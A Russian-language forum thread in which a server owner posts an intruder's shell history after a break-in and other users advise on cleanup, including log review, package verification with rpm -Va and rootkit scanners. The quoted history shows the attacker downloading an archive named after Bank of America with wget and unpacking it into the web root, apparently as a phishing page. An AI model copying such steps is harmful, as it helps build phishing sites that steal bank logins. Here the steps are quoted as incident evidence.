Взломали. Что делать?

0

0

Только что зашёл на свою машину через ssh и обнаружил, что последний сеанс был неизвестно откуда :-(
Вот последние выполненные команды (из history):
================================
982 cd /usr/include/
983 cat libssh.h
984 more libssh.h
985 cd /var/www
986 ls -all
987 cd html
988 ls
989 cat index.html
990 ftp
991 wget http://www.caldsl.com/~b1yamamoto/ww...ica.com.tar.gz
992 wget http://www.caldsl.com/~b1yamamoto/ww...ica.com.tar.gz
993 ftp
994 ls
995 tar zxvf www.bankofamerica.com.tar.gz
996 rm -rf
997 ls
998 cd http://www.bankofamerica.com/sslencr...nline_banking/
999 pico done.php
1000 nano done.php
================================

Первый вопрос: как? У меня нормальный пароль (10 случайных символов), сервисов никаких опасных вроде бы не запущено (но запущен iptables).
Правда я вчера запустил proftpd... Система конечно немного старовата -- FC5...
Второй вопрос: что делать?
С помощью этих команд, как я понял, мне залили фишинг страничку (её я уже удалил). Вопрос в том, что делать дальше?
Пароль сменил, proftpd остановил. Что ещё надо сделать?

Ссылка

←	XEN, 64/32 бита, вопросы

java+ant+tomcat=??

→

>982 cd /usr/include/
>983 cat libssh.h
>984 more libssh.h


Это уже дурно пахнет...

anonymous
(06.09.07 12:57:47 MSD)

Ссылка

Посмотреть откуда шли соединения, выяснить провайдера, позвонить, выяснить имя и фамилию клиента, настучать в репу.

Rain ★★★★
(06.09.07 13:52:35 MSD)

Ссылка

Так ты что, не обновлял ПО с марта прошлого года? o_O

grad
(06.09.07 14:12:42 MSD)

Ссылка

смотри messages, убей дырявый proftpd (Какая версия?).
Собери новый ssh.
У тебя на серваке сайт? (Если да то надежней сделать откать на версию из backup до взлова)
Я бы еще глянул все файлы созданные или измененные в это время (Например в /lib :)))
И как сказал Rain по бороде надо таким хацкерам!

Giz0 ★
(06.09.07 14:14:22 MSD)

Ответ на: комментарий от Giz0 06.09.07 14:14:22 MSD

Да это был какой-то АОЛовец. Мне до него трудно будет добраться, чтобы по бороде настучать :-)

Kinjo ★
(07.09.07 03:35:39 MSD) автор топика

Ссылка

Ответ на: комментарий от Giz0 06.09.07 14:14:22 MSD

Да, ещё забыл. По поводу нового ssh: переустановить его из rpm будет достаточно?

Kinjo ★
(07.09.07 03:36:23 MSD) автор топика

Ответ на: комментарий от Kinjo 07.09.07 03:36:23 MSD

в редхете есть возможность сверить md5 хеш пакета ? типа debsums в дебиане ? 

если да то стоит проверить был ли модифицирован пакет c ssh

судя по приведенным командам из history ничего очень страшного сделано не было .

другое дело вся ли это history ...

также запуcти rkhunter или chkrootkit 
на всякии случай .

j262 ★★
(07.09.07 10:22:09 MSD)

Ответ на: комментарий от j262 07.09.07 10:22:09 MSD

> в редхете есть возможность сверить md5 хеш пакета ?
Есть: "rpm -Va" - проверит ВСЕ установленные пакеты, покажет у каких файлов изменились права, владелец/группа, md5 сумма и т.п.

spirit ★★★★★
(07.09.07 12:42:34 MSD)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	XEN, 64/32 бита, вопросы

Admin

java+ant+tomcat=??

→

Похожие темы